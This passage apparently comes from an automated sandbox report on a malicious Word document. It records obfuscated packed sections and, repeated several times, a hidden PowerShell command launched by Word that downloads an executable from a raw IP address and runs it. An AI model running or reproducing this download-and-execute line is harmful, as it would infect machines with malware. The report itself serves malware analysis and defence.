          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeUnpacked PE file: 10.2.docsc.exe.bd0000.3.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
          Suspicious powershell command line foundShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: docsc[1].exe.0.drStatic PE information: section name: U#j;F_`
          Source: docsc[1].exe.0.drStatic PE information: section name:
          Source: docsc.exe.3.drStatic PE information: section name: U#j;F_`
          Source: docsc.exe.3.drStatic PE information: section name:
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004392EF push ss; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00438F95 push edi; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8B5C2 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C88FD4 push ds; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8ADE3 pushad ; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8B5F8 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8B9FA push ss; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C88485 push ds; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8BB44 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8B346 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8BB56 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8AE02 pushad ; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C88118 push FFFFFF8Fh; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8B610 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 11_2_00C8BB32 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004161E7 push edi; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004151B4 pushfd ; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B3B5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B46C push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B402 push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B40B push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041543B pushfd ; iretd
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00415485 push edx; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000951B4 pushfd ; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000961E7 push edi; retf
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009543B pushfd ; iretd
          Source: initial sampleStatic PE information: section name: U#j;F_` entropy: 7.99977911602
          Source: initial sampleStatic PE information: section name: U#j;F_` entropy: 7.99977911602

          Persistence and Installation Behavior:

          barindex
          Tries to download and execute files (via powershell)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\docsc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
